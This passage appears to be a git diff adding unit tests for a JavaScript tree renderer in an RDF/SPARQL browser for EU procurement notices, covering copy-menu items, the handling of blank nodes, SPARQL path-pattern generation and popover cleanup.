+    ['Copy path', 'Copy IRI', 'SPARQL reference card']);
+});
+
+test('a nested card header offers the resource it points at', () => {
+  const { container } = renderedNotice();
+  const headerMenu = actionMenus(container)[2];
+
+  assert.deepEqual(labelsOf(headerMenu), ['Copy path', 'Copy value', 'SPARQL reference card']);
+  assert.equal(itemNamed(headerMenu, 'Copy value').getAttribute('data-copy'), REVIEWER);
+});
+
+test('a blank node offers nothing to copy', () => {
+  // Its label belongs to this parse alone. Copying "b0_b0" hands someone a
+  // string that identifies nothing outside this page.
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([
+    quad(NOTICE, RDF_TYPE, namedNode(EPO_NOTICE_CLASS)),
+    quad(NOTICE, EPO_ANNOUNCES_ROLE, blankNode('b0')),
+    { subject: blankNode('b0'), predicate: namedNode(RDF_TYPE), object: namedNode(EPO_REVIEWER_CLASS) },
+  ], { subjectUri: NOTICE });
+
+  const headerMenu = actionMenus(container)
+    .find(m => !labelsOf(m).includes('Copy value') && !labelsOf(m).includes('Copy IRI'));
+
+  assert.ok(headerMenu, 'the blank node card carries a menu');
+  assert.deepEqual(labelsOf(headerMenu), ['Copy path', 'SPARQL reference card'],
+    'a path still reaches it; nothing identifies it outside this page');
+});
+
+test('the toast distinguishes an IRI from a plain value', () => {
+  // A resource's value is a long URI; "copied" alone leaves the reader unsure
+  // which of the two things on the row they are now holding.
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([
+    quad(NOTICE, RDF_TYPE, namedNode(EPO_NOTICE_CLASS)),
+    quad(NOTICE, 'http://example.org/label', literal('ANAC AUTORITA')),
+  ], { subjectUri: NOTICE });
+
+  const [resourceRow, literalRow] = actionMenus(container).slice(1);
+
+  assert.equal(itemNamed(resourceRow, 'Copy value').getAttribute('data-copy'), EPO_NOTICE_CLASS);
+  assert.equal(itemNamed(literalRow, 'Copy value').getAttribute('data-copy'), 'ANAC AUTORITA');
+});
+
+test('Copy path puts the row pattern on the clipboard', () => {
+  // Naming the variable after what the Reviewer is, exactly as the card's own
+  // Path row does — the two are the same call and must not drift apart.
+  const { container } = renderedNotice();
+  const rowMenu = actionMenus(container)[2];
+
+  assert.equal(
+    itemNamed(rowMenu, 'Copy path').getAttribute('data-copy'),
+    '?notice a epo:Notice ; epo:announcesRole ?reviewer .',
+  );
+});
+
+test('a row with no path to offer shows no Copy path', () => {
+  // An untyped blank node at the root cannot be named in a query, so nothing
+  // below it can be reached from one either.
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([
+    { subject: blankNode('b0'), predicate: namedNode('http://example.org/p'), object: literal('x') },
+  ], {});
+
+  const rowMenu = actionMenus(container).at(-1);
+  assert.ok(!labelsOf(rowMenu).includes('Copy path'), labelsOf(rowMenu).join(', '));
+});
+
+const dividersIn = (menu) => menu._children
+  .find(c => String(c.className).includes('dropdown-menu'))
+  ._children.filter(li => String(li._children[0]?.className).includes('dropdown-divider'))
+  .length;
+
+test('a rule separates acting on the row from reading about it', () => {
+  const { container } = renderedNotice();
+  assert.equal(dividersIn(actionMenus(container)[1]), 1);
+});
+
+test('no rule where there is nothing above it', () => {
+  // An untyped blank node has neither a path nor an identifier to copy, so
+  // the card is the only item and a divider would sit at the very top.
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([
+    { subject: blankNode('b0'), predicate: namedNode('http://example.org/p'), object: literal('x') },
+  ], {});
+
+  const rootMenu = actionMenus(container)[0];
+  assert.deepEqual(labelsOf(rootMenu), ['SPARQL reference card']);
+  assert.equal(dividersIn(rootMenu), 0);
+});
+
+// ── what the menu must not offer ────────────────────────────────────
+
+test('an ontology term offers its usage, never a path', () => {
+  // "?datatypeProperty a owl:DatatypeProperty ." matches every datatype
+  // property in the ontology, not the one on screen. The card already draws
+  // this distinction; the menu has to draw the same one.
+  const OWL_DATATYPE_PROPERTY = 'http://www.w3.org/2002/07/owl#DatatypeProperty';
+  const RDFS = 'http://www.w3.org/2000/01/rdf-schema#';
+  const TERM = 'http://data.europa.eu/a4g/ontology#hasPublicationDate';
+
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([
+    quad(TERM, RDF_TYPE, namedNode(OWL_DATATYPE_PROPERTY)),
+    quad(TERM, `${RDFS}domain`, namedNode('http://data.europa.eu/a4g/ontology#Document')),
+    quad(TERM, `${RDFS}range`, namedNode('http://www.w3.org/2001/XMLSchema#date')),
+  ], { subjectUri: TERM });
+
+  const menu = actionMenus(container)[0];
+  assert.ok(!labelsOf(menu).includes('Copy path'), labelsOf(menu).join(', '));
+  assert.equal(itemNamed(menu, 'Copy usage').getAttribute('data-copy'),
+    '?document epo:hasPublicationDate ?date .');
+});
+
+test('a row pointing back at its own anchor binds a second variable', () => {
+  // "?notice a epo:Notice ; epo:refersToPrevious ?notice ." matches only the
+  // notices that refer to themselves.
+  const r = makeRenderer();
+  const path = r._buildRowPathPattern(
+    'http://data.europa.eu/a4g/ontology#refersToPrevious',
+    new Map([[RDF_TYPE, [namedNode(EPO_NOTICE_CLASS)]]]),
+    {
+      root: NOTICE,
+      anchor: '?notice a epo:Notice',
+      chain: ['http://data.europa.eu/a4g/ontology#refersToPrevious'],
+    },
+  );
+
+  assert.equal(path, '?notice a epo:Notice ; epo:refersToPrevious ?notice2 .');
+});
+
+test('a blank-node value offers nothing to copy', () => {
+  // "b0" is a label this parse invented; it identifies nothing anywhere else.
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([
+    quad(NOTICE, RDF_TYPE, namedNode(EPO_NOTICE_CLASS)),
+    // Not a subject anywhere, so it stays a leaf row rather than nesting.
+    quad(NOTICE, EPO_ANNOUNCES_ROLE, blankNode('b0')),
+  ], { subjectUri: NOTICE });
+
+  const rowMenu = actionMenus(container).at(-1);
+  assert.ok(!labelsOf(rowMenu).includes('Copy value'), labelsOf(rowMenu).join(', '));
+  assert.ok(labelsOf(rowMenu).includes('Copy path'), 'the path to it is still real');
 });

--- a/test/treeRenderer.test.js
+++ b/test/treeRenderer.test.js
@@ -968,6 +968,99 @@ const labelsOf = (menu) => itemsOf(menu).map(b => b.innerHTML.replace(/<[^>]*>/g
 const itemNamed = (menu, label) => itemsOf(menu)[labelsOf(menu).indexOf(label)];
 const cardItemOf = (menu) => itemNamed(menu, 'SPARQL reference card');
 
+// ── the reference card's lifetime ──────────────────────────────────
+
+// Bootstrap holds every Popover it makes in a strong map, and only dispose()
+// lets go. A card opened and never disposed therefore pins its anchor and its
+// tip for as long as the page lives — through navigation, since render() only
+// clears the DOM.
+
+/** Fire the click handlers a stub element has collected. */
+const clickOn = (el) => (el._listeners?.get('click') || []).forEach(h => h());
+
+/**
+ * A rendered notice with the popover census reset, since earlier tests in
+ * this file open cards of their own and never close them.
+ */
+function withFreshCards() {
+  bootstrap.Popover.live.clear();
+  return renderedNotice();
+}
+
+test('opening one card and then another leaves the first openable', () => {
+  const { container } = withFreshCards();
+  const [first, second] = actionMenus(container);
+
+  clickOn(cardItemOf(first));
+  clickOn(cardItemOf(second));   // shuts the first to open this one
+
+  // The first card's popover was disposed to make way, and a disposed
+  // popover is empty — reopening has to build a new one, not reach for it.
+  assert.doesNotThrow(() => clickOn(cardItemOf(first)));
+});
+
+test('a card closed by opening another is disposed, not merely hidden', () => {
+  const { container } = withFreshCards();
+  const [first, second] = actionMenus(container);
+
+  clickOn(cardItemOf(first));
+  assert.equal(bootstrap.Popover.live.size, 1);
+
+  clickOn(cardItemOf(second));
+  assert.equal(bootstrap.Popover.live.size, 1, 'the first is let go, not kept alongside');
+});
+
+test('a card closed by its own menu item is disposed', () => {
+  const { container } = withFreshCards();
+  const [menu] = actionMenus(container);
+
+  clickOn(cardItemOf(menu));
+  clickOn(cardItemOf(menu));     // the same item again shuts it
+
+  assert.equal(bootstrap.Popover.live.size, 0);
+});
+
+// The card's own × is wired inside the shown.bs.popover handler, so it is
+// the path furthest from the code that opens the card — and the one where a
+// second, shorter teardown is easiest to write by mistake.
+test('a card closed by its own × is disposed', () => {
+  const { container } = withFreshCards();
+  const [menu] = actionMenus(container);
+
+  clickOn(cardItemOf(menu));
+  const popover = bootstrap.Popover.live.values().next().value;
+  clickOn(popover.tip.querySelector('.tree-info-close'));
+
+  assert.equal(bootstrap.Popover.live.size, 0);
+});
+
+// An open card listens for clicks anywhere else. That listener has to go
+// when the card does, or it outlives the popover it was watching for.
+test('closing a card takes its outside-click listener with it', () => {
+  const { container } = withFreshCards();
+  const [menu] = actionMenus(container);
+  const watching = () => (document._listeners.get('click') || []).length;
+
+  const before = watching();
+  clickOn(cardItemOf(menu));
+  assert.equal(watching(), before + 1, 'an open card watches for a click elsewhere');
+
+  clickOn(cardItemOf(menu));
+  assert.equal(watching(), before, 'and stops watching once it is closed');
+});
+
+// Navigating away clears the DOM, which drops the elements but not the
+// popovers Bootstrap is still holding by them.
+test('navigating away disposes the open card', () => {
+  const { r, container } = withFreshCards();
+  clickOn(cardItemOf(actionMenus(container)[0]));
+  assert.equal(bootstrap.Popover.live.size, 1);
+
+  r.render([], { subjectUri: NOTICE });
+
+  assert.equal(bootstrap.Popover.live.size, 0);
+});
+
 test('every row carries a menu, alongside the one on the card', () => {
   const { container } = renderedNotice();
 

--- a/test/treeRenderer.test.js
+++ b/test/treeRenderer.test.js
@@ -23,16 +23,24 @@ import { test } from 'node:test';
 import assert from 'node:assert/strict';
 import './_helpers.js'; // provides the minimal document shim TreeRenderer needs at construction
 import { TreeRenderer } from '../src/js/TreeRenderer.js';
+import { setController } from '../src/js/TermRenderer.js';
 
 // Real URIs from TED notice 00172531-2026's DESCRIBE response.
 const NOTICE      = 'http://data.europa.eu/a4g/resource/id_6497924e-6920-4348-8ecb-71530f802aef_Notice';
 const PROCEDURE   = 'http://data.europa.eu/a4g/resource/id_6497924e-6920-4348-8ecb-71530f802aef_Procedure_6dcsBnuV4FTNoRpTZHckqN';
 const LOT         = 'http://data.europa.eu/a4g/resource/id_6497924e-6920-4348-8ecb-71530f802aef_Lot_LOT-0001';
 const CONTRACT    = 'http://data.europa.eu/a4g/resource/id_6497924e-6920-4348-8ecb-71530f802aef_SettledContract_CON-0001';
+const REVIEWER     = 'http://data.europa.eu/a4g/resource/id_6497924e-6920-4348-8ecb-71530f802aef_Reviewer_3qDoBaQsAXVe5Ci2dDBD6C';
+const ORGANISATION = 'http://data.europa.eu/a4g/resource/id_6497924e-6920-4348-8ecb-71530f802aef_Organisation_ORG-0002';
 const RDF_TYPE    = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#type';
 const EPO_CONCERNS_PROC = 'http://data.europa.eu/a4g/ontology#concernsProcedure';
 const EPO_HAS_LOT_REF   = 'http://data.europa.eu/a4g/ontology#hasLotReference';
 const EPO_NOTICE_CLASS  = 'http://data.europa.eu/a4g/ontology#Notice';
+const EPO_ANNOUNCES_ROLE   = 'http://data.europa.eu/a4g/ontology#announcesRole';
+const EPO_PLAYED_BY        = 'http://data.europa.eu/a4g/ontology#playedBy';
+const EPO_REVIEWER_CLASS   = 'http://data.europa.eu/a4g/ontology#Reviewer';
+const EPO_ORGANISATION_CLASS = 'http://data.europa.eu/a4g/ontology#Organisation';
+const EPO_PROCEDURE_CLASS  = 'http://data.europa.eu/a4g/ontology#Procedure';
 const XSD_STRING  = 'http://www.w3.org/2001/XMLSchema#string';
 
 // N3-shaped quad. The real parser returns {subject, predicate, object}
@@ -257,40 +265,655 @@ test('_partitionObjects preserves per-object order within each bucket', () => {
 
 // ── _formatPropertyPath ─────────────────────────────────────────────
 
-const EPO = 'http://data.europa.eu/a4g/ontology#';
-
-test('_formatPropertyPath shrinks ePO predicates to prefixed form', () => {
+test('_formatPropertyPath shrinks a single known-namespace predicate', () => {
   const r = makeRenderer();
-  const path = r._formatPropertyPath([
-    EPO + 'refersToLot',
-    EPO + 'hasPurpose',
-    EPO + 'hasMainClassification',
-  ]);
-  assert.equal(path, 'epo:refersToLot / epo:hasPurpose / epo:hasMainClassification');
+  assert.equal(r._formatPropertyPath([EPO_ANNOUNCES_ROLE]), 'epo:announcesRole');
 });
 
-test('_formatPropertyPath handles a single-predicate path', () => {
+test('_formatPropertyPath joins a multi-hop chain with the sequence operator', () => {
   const r = makeRenderer();
-  const path = r._formatPropertyPath([EPO + 'hasPublicationDate']);
-  assert.equal(path, 'epo:hasPublicationDate');
+  assert.equal(
+    r._formatPropertyPath([EPO_ANNOUNCES_ROLE, EPO_PLAYED_BY]),
+    'epo:announcesRole / epo:playedBy',
+  );
 });
 
-test('_formatPropertyPath wraps unknown-namespace URIs in angle brackets', () => {
+test('_formatPropertyPath wraps unknown-namespace predicates in angle brackets', () => {
+  // shrink() returns the URI unchanged when no prefix matches. Emitting it
+  // bare would be invalid SPARQL, so it must come back bracketed.
   const r = makeRenderer();
-  const path = r._formatPropertyPath(['http://example.org/custom#someProperty']);
-  assert.equal(path, '<http://example.org/custom#someProperty>');
+  assert.equal(
+    r._formatPropertyPath(['http://example.org/custom#linksTo']),
+    '<http://example.org/custom#linksTo>',
+  );
 });
 
-test('_formatPropertyPath mixes prefixed and full URIs in one path', () => {
+test('_formatPropertyPath mixes shrunk and bracketed predicates in one chain', () => {
   const r = makeRenderer();
-  const path = r._formatPropertyPath([
-    EPO + 'refersToLot',
-    'http://example.org/custom#link',
-  ]);
-  assert.equal(path, 'epo:refersToLot / <http://example.org/custom#link>');
+  assert.equal(
+    r._formatPropertyPath([EPO_ANNOUNCES_ROLE, 'http://example.org/custom#linksTo']),
+    'epo:announcesRole / <http://example.org/custom#linksTo>',
+  );
 });
 
-test('_formatPropertyPath returns empty string for an empty path', () => {
+test('_formatPropertyPath returns an empty string for an empty chain', () => {
   const r = makeRenderer();
   assert.equal(r._formatPropertyPath([]), '');
+});
+
+// ── _buildPathPattern ───────────────────────────────────────────────
+//
+// The Path row on the SPARQL reference card (issue #73). The chain and the
+// root pattern are supplied by DataView from the breadcrumb; these tests set
+// them directly, which is exactly the state render() installs.
+
+// Puts the renderer in the state it would be in after the user navigated
+// from a notice down to `subject` along `chain`.
+function navigatedTo(r, subject, chain, rootPattern = '?notice a epo:Notice') {
+  r._navigatedSubject = subject;
+  r._pathFromRoot = chain;
+  r._rootPattern = rootPattern;
+}
+
+function typedAs(classUri) {
+  return new Map([[RDF_TYPE, [namedNode(classUri)]]]);
+}
+
+test('_buildPathPattern renders the walked chain anchored at the root pattern', () => {
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [EPO_ANNOUNCES_ROLE]);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, typedAs(EPO_REVIEWER_CLASS)),
+    '?notice a epo:Notice ; epo:announcesRole ?reviewer .',
+  );
+});
+
+test('_buildPathPattern joins a multi-hop chain into one property path', () => {
+  // The whole point of #73: the route survives several navigations.
+  const r = makeRenderer();
+  navigatedTo(r, ORGANISATION, [EPO_ANNOUNCES_ROLE, EPO_PLAYED_BY]);
+  assert.equal(
+    r._buildPathPattern(ORGANISATION, typedAs(EPO_ORGANISATION_CLASS)),
+    '?notice a epo:Notice ; epo:announcesRole / epo:playedBy ?organisation .',
+  );
+});
+
+test('_buildPathPattern names the bound variable after the resource type', () => {
+  // ?reviewer, not a bare ?value — the pattern should say what it binds.
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [EPO_ANNOUNCES_ROLE]);
+  const pattern = r._buildPathPattern(REVIEWER, typedAs(EPO_REVIEWER_CLASS));
+  assert.ok(pattern.endsWith('?reviewer .'), pattern);
+});
+
+test('_buildPathPattern renames the target when it would collide with the root variable', () => {
+  // Notice → Notice: binding ?notice at both ends would silently change the
+  // meaning of the query.
+  const r = makeRenderer();
+  navigatedTo(r, NOTICE, [EPO_ANNOUNCES_ROLE]);
+  assert.equal(
+    r._buildPathPattern(NOTICE, typedAs(EPO_NOTICE_CLASS)),
+    '?notice a epo:Notice ; epo:announcesRole ?notice2 .',
+  );
+});
+
+test('_buildPathPattern falls back to a type binding when nothing was navigated', () => {
+  // Sitting on the notice itself: no chain walked yet.
+  const r = makeRenderer();
+  navigatedTo(r, NOTICE, []);
+  assert.equal(
+    r._buildPathPattern(NOTICE, typedAs(EPO_NOTICE_CLASS)),
+    '?notice a epo:Notice .',
+  );
+});
+
+test('_buildPathPattern falls back to a type binding when no root pattern is known', () => {
+  // A shared link opens mid-exploration with no recorded breadcrumb route.
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [EPO_ANNOUNCES_ROLE], null);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, typedAs(EPO_REVIEWER_CLASS)),
+    '?reviewer a epo:Reviewer .',
+  );
+});
+
+test('_buildPathPattern does not give a sibling root the navigated subject chain', () => {
+  // A graph can surface several root cards. Only the subject actually
+  // navigated to owns the walked chain; the others must not claim it.
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [EPO_ANNOUNCES_ROLE]);
+  assert.equal(
+    r._buildPathPattern(PROCEDURE, typedAs(EPO_PROCEDURE_CLASS)),
+    '?procedure a epo:Procedure .',
+  );
+});
+
+test('_buildPathPattern binds an untyped resource by its IRI', () => {
+  // No rdf:type means no sensible variable name and no class to match on;
+  // the IRI is the only thing that identifies it.
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [], null);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, new Map()),
+    `<${REVIEWER}> ?predicate ?value .`,
+  );
+});
+
+test('_buildPathPattern binds every declared type, not one of them', () => {
+  // A real notice carries epo:Notice alongside epo:CompetitionNotice and a
+  // mapping-version class such as epo:Notice16, in no guaranteed order.
+  // Singling one out both discards what the resource is and makes the pattern
+  // depend on the order the endpoint returned the triples in — which is how
+  // the anchor ended up reading "?notice16 a epo:Notice16 ." in the browser.
+  const r = makeRenderer();
+  navigatedTo(r, NOTICE, []);
+  const predicates = new Map([[RDF_TYPE, [
+    namedNode('http://data.europa.eu/a4g/ontology#Notice16'),
+    namedNode(EPO_NOTICE_CLASS),
+    namedNode('http://data.europa.eu/a4g/ontology#CompetitionNotice'),
+  ]]]);
+  assert.equal(
+    r._buildPathPattern(NOTICE, predicates),
+    '?notice a epo:Notice16, epo:Notice, epo:CompetitionNotice .',
+  );
+});
+
+test('_variableNameFrom prefers the shortest local name for legibility', () => {
+  // Only the label is chosen here — every type is bound regardless, so this
+  // cannot change what the query matches. It just reads better.
+  const r = makeRenderer();
+  assert.equal(
+    r._variableNameFrom([
+      'http://data.europa.eu/a4g/ontology#Notice16',
+      'http://data.europa.eu/a4g/ontology#Notice',
+      'http://data.europa.eu/a4g/ontology#CompetitionNotice',
+    ]),
+    'notice',
+  );
+});
+
+test('_variableNameFrom is stable when local names tie on length', () => {
+  const r = makeRenderer();
+  const uris = ['http://ex.org/Beta', 'http://ex.org/Alfa'];
+  assert.equal(r._variableNameFrom(uris), 'alfa');
+  assert.equal(r._variableNameFrom([...uris].reverse()), 'alfa');
+});
+
+// ── predicate path threading ────────────────────────────────────────
+
+test('_buildCardBody appends each predicate to the path handed to its children', () => {
+  // The chain that reaches a clicked node is accumulated during rendering.
+  // If this stops growing, every path below the first level goes wrong —
+  // and nothing else in the suite would notice.
+  const r = makeRenderer();
+  r.subjectIndex = new Map([[PROCEDURE, new Map()]]);
+
+  const seen = { rows: [], cards: [] };
+  r._renderPredicateObject = (pred, obj, ctx) => { seen.rows.push(ctx); return {}; };
+  r._renderSubjectTree = (subj, anc, pred, ctx) => { seen.cards.push(ctx); return {}; };
+
+  const parent = { root: NOTICE, anchor: '?notice a epo:Notice', chain: [EPO_PLAYED_BY] };
+  const predicates = new Map([
+    [EPO_ANNOUNCES_ROLE, [namedNode(PROCEDURE), literal('a leaf')]],
+  ]);
+  r._buildCardBody(predicates, new Set(), parent);
+
+  const expected = [EPO_PLAYED_BY, EPO_ANNOUNCES_ROLE];
+  assert.deepEqual(seen.cards[0].chain, expected, 'nested card');
+  assert.deepEqual(seen.rows[0].chain, expected, 'leaf row');
+  assert.equal(seen.cards[0].root, NOTICE, 'root identity is carried down unchanged');
+  assert.equal(seen.cards[0].anchor, '?notice a epo:Notice');
+  assert.deepEqual(parent.chain, [EPO_PLAYED_BY], 'parent context is not mutated');
+});
+
+test('_buildCardBody keeps sibling predicates on separate branches', () => {
+  // childPath must be derived from the parent path each time, not mutated
+  // in place — otherwise the second predicate inherits the first.
+  const r = makeRenderer();
+  r.subjectIndex = new Map();
+
+  const seen = [];
+  r._renderPredicateObject = (pred, obj, ctx) => { seen.push(ctx.chain); return {}; };
+
+  const predicates = new Map([
+    [EPO_ANNOUNCES_ROLE, [literal('one')]],
+    [EPO_PLAYED_BY, [literal('two')]],
+  ]);
+  r._buildCardBody(predicates, new Set(), { root: NOTICE, anchor: '?notice a epo:Notice', chain: [] });
+
+  assert.deepEqual(seen, [[EPO_ANNOUNCES_ROLE], [EPO_PLAYED_BY]]);
+});
+
+// ── SPARQL validity of the generated pattern ────────────────────────
+//
+// The Path row is meant to be pasted straight into a query, so anything it
+// emits has to parse. These cover the shapes that are not ePO-with-a-clean-
+// local-name, which is everything the Reuse tab can render from a CONSTRUCT.
+
+test('_buildPathPattern does not put a semicolon after an IRI anchor', () => {
+  // "<iri> ; epo:foo ?bar ." is a syntax error — a semicolon continues a
+  // predicate list, and an IRI on its own has not started one.
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [EPO_ANNOUNCES_ROLE], `<${NOTICE}>`);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, typedAs(EPO_REVIEWER_CLASS)),
+    `<${NOTICE}> epo:announcesRole ?reviewer .`,
+  );
+});
+
+test('_buildPathPattern brackets a type from an unknown namespace', () => {
+  // shrink() passes unknown namespaces through untouched, and a bare IRI is
+  // not valid in the object position of "a".
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [], null);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, typedAs('http://example.org/SomeType')),
+    '?someType a <http://example.org/SomeType> .',
+  );
+});
+
+test('_buildPathPattern strips characters a SPARQL variable cannot contain', () => {
+  // "?some-Type" and "?some.Type" are unparseable.
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [], null);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, typedAs('http://example.org/Some-Type.v2')),
+    '?some_Type_v2 a <http://example.org/Some-Type.v2> .',
+  );
+});
+
+test('_buildPathPattern falls back to ?value when a type yields no usable name', () => {
+  // A local name that is entirely punctuation or starts with a digit cannot
+  // seed a variable at all.
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [], null);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, typedAs('http://example.org/123')),
+    '?value a <http://example.org/123> .',
+  );
+});
+
+test('_buildAnchorPattern binds an untyped root by its IRI', () => {
+  const r = makeRenderer();
+  assert.equal(r._buildAnchorPattern(REVIEWER, new Map()), `<${REVIEWER}>`);
+});
+
+test('_buildAnchorPattern binds a typed root by its class', () => {
+  const r = makeRenderer();
+  assert.equal(
+    r._buildAnchorPattern(NOTICE, typedAs(EPO_NOTICE_CLASS)),
+    '?notice a epo:Notice',
+  );
+});
+
+// ── per-root navigation context ─────────────────────────────────────
+
+test('render gives each root card its own anchor and root identity', () => {
+  // A graph with two roots. A chain walked under one of them must not be
+  // reported as if it started at the other — that produces a pattern which
+  // parses cleanly and means something false.
+  const r = makeRenderer();
+  const captured = [];
+  r._renderSubjectTree = (subj, anc, pred, ctx) => { captured.push(ctx); return {}; };
+
+  r.render([
+    quad(NOTICE, RDF_TYPE, namedNode(EPO_NOTICE_CLASS)),
+    quad(PROCEDURE, RDF_TYPE, namedNode(EPO_PROCEDURE_CLASS)),
+  ], {});
+
+  assert.equal(captured.length, 2, 'both roots rendered');
+  assert.deepEqual(
+    captured.map(c => [c.root, c.anchor, c.chain.length]),
+    [
+      [NOTICE, '?notice a epo:Notice', 0],
+      [PROCEDURE, '?procedure a epo:Procedure', 0],
+    ],
+  );
+});
+
+test('_navigationContext reports the chain, its root, and that root pattern', () => {
+  const r = makeRenderer();
+  const ctx = { root: NOTICE, anchor: '?notice a epo:Notice', chain: [EPO_ANNOUNCES_ROLE] };
+  assert.deepEqual(r._navigationContext(ctx), {
+    viaPath: [EPO_ANNOUNCES_ROLE],
+    viaRoot: NOTICE,
+    viaRootPattern: '?notice a epo:Notice',
+  });
+});
+
+test('_navigationContext reports nothing when there is no context to report', () => {
+  // An element rendered outside a root's subtree must not claim a route.
+  const r = makeRenderer();
+  assert.deepEqual(r._navigationContext(null), {});
+});
+
+// ── blank-node subjects ─────────────────────────────────────────────
+//
+// The subject index is keyed by bare value, which drops the term type, and
+// the parser hands blank nodes over as plain labels like "b0_b0". Treated as
+// an IRI that becomes <b0_b0> — a relative reference to something entirely
+// unrelated, in a pattern that parses cleanly.
+
+test('_buildAnchorPattern refuses to name an untyped blank node', () => {
+  const r = makeRenderer();
+  r.subjectIndex = r._buildIndex([
+    { subject: blankNode('b0_b0'), predicate: namedNode(EPO_PLAYED_BY), object: literal('x') },
+  ]);
+  assert.equal(r._buildAnchorPattern('b0_b0', r.subjectIndex.get('b0_b0')), null);
+});
+
+test('_buildAnchorPattern binds a typed blank node by its class', () => {
+  // Identity is not needed here: the pattern matches on the type, so a blank
+  // node is as addressable as any other resource.
+  const r = makeRenderer();
+  r.subjectIndex = r._buildIndex([
+    { subject: blankNode('b0_b0'), predicate: namedNode(RDF_TYPE), object: namedNode(EPO_REVIEWER_CLASS) },
+  ]);
+  assert.equal(
+    r._buildAnchorPattern('b0_b0', r.subjectIndex.get('b0_b0')),
+    '?reviewer a epo:Reviewer',
+  );
+});
+
+test('_buildPathPattern offers no pattern at all for an untyped blank node', () => {
+  // The card drops the Path row entirely rather than showing <b0_b0>.
+  const r = makeRenderer();
+  r.subjectIndex = r._buildIndex([
+    { subject: blankNode('b0_b0'), predicate: namedNode(EPO_PLAYED_BY), object: literal('x') },
+  ]);
+  navigatedTo(r, 'b0_b0', [], null);
+  assert.equal(r._buildPathPattern('b0_b0', r.subjectIndex.get('b0_b0')), null);
+});
+
+test('_buildPathPattern still names an untyped IRI subject', () => {
+  // Only blank nodes are unnameable; an IRI without a type is fine.
+  const r = makeRenderer();
+  r.subjectIndex = r._buildIndex([
+    quad(REVIEWER, EPO_PLAYED_BY, literal('x')),
+  ]);
+  navigatedTo(r, REVIEWER, [], null);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, r.subjectIndex.get(REVIEWER)),
+    `<${REVIEWER}> ?predicate ?value .`,
+  );
+});
+
+test('render gives an untyped blank-node root no anchor to record', () => {
+  // Descendants of that root must not report a route, or a click beneath it
+  // would anchor the chain to <b0_b0>.
+  const r = makeRenderer();
+  const captured = [];
+  r._renderSubjectTree = (subj, anc, pred, ctx) => { captured.push(ctx); return {}; };
+
+  r.render([
+    { subject: blankNode('b0_b0'), predicate: namedNode(EPO_PLAYED_BY), object: literal('x') },
+  ], {});
+
+  assert.equal(captured.length, 1);
+  assert.equal(captured[0].anchor, null);
+  assert.deepEqual(r._navigationContext(captured[0]).viaRootPattern, null);
+});
+
+test('_buildInfoRows omits the IRI row for a blank node', () => {
+  // <b0_b0> is a relative IRI pointing at something unrelated, offered with a
+  // copy button as though it identified this resource.
+  const r = makeRenderer();
+  r.subjectIndex = r._buildIndex([
+    { subject: blankNode('b0_b0'), predicate: namedNode(RDF_TYPE), object: namedNode(EPO_REVIEWER_CLASS) },
+  ]);
+  const html = r._buildInfoRows('b0_b0', r.subjectIndex.get('b0_b0'));
+
+  assert.ok(!html.includes('>IRI<'), 'no IRI row');
+  assert.ok(!html.includes('b0_b0'), 'the blank label is never shown as a term');
+  assert.ok(html.includes('>Path<'), 'a typed blank node still has a usable pattern');
+});
+
+test('_buildInfoRows keeps the IRI row for a named resource', () => {
+  const r = makeRenderer();
+  r.subjectIndex = r._buildIndex([quad(REVIEWER, RDF_TYPE, namedNode(EPO_REVIEWER_CLASS))]);
+  const html = r._buildInfoRows(REVIEWER, r.subjectIndex.get(REVIEWER));
+
+  assert.ok(html.includes('>IRI<'), 'IRI row present');
+  assert.ok(html.includes(`&lt;${REVIEWER}&gt;`), 'IRI shown escaped');
+});
+
+// ── prefixed names that cannot parse ────────────────────────────────
+//
+// shrink() matches on namespace and slices the rest off blindly, so a known
+// namespace does not guarantee a legal prefixed name. The dangerous case is a
+// slash: inside a property path "schema:foo/bar" reads as a sequence
+// operator, so the pattern parses and quietly means something else.
+
+const SCHEMA_NESTED = 'http://schema.org/foo/bar';
+
+test('_shrinkOrBracket keeps a well-formed prefixed name', () => {
+  const r = makeRenderer();
+  assert.equal(r._shrinkOrBracket(EPO_ANNOUNCES_ROLE), 'epo:announcesRole');
+});
+
+test('_shrinkOrBracket brackets a known namespace whose local part has a slash', () => {
+  const r = makeRenderer();
+  assert.equal(r._shrinkOrBracket(SCHEMA_NESTED), `<${SCHEMA_NESTED}>`);
+});
+
+test('_shrinkOrBracket brackets local parts with spaces or brackets', () => {
+  const r = makeRenderer();
+  // A space cannot appear inside <> either — IRIREF excludes it — so falling
+  // back to the full IRI also means percent-encoding what IRIREF forbids.
+  assert.equal(
+    r._shrinkOrBracket('http://purl.org/dc/terms/a b'),
+    '<http://purl.org/dc/terms/a%20b>',
+  );
+  // Parentheses are legal in an IRIREF, so they survive untouched — only the
+  // characters the grammar actually excludes get encoded.
+  assert.equal(
+    r._shrinkOrBracket('http://data.europa.eu/m8g/x(y)'),
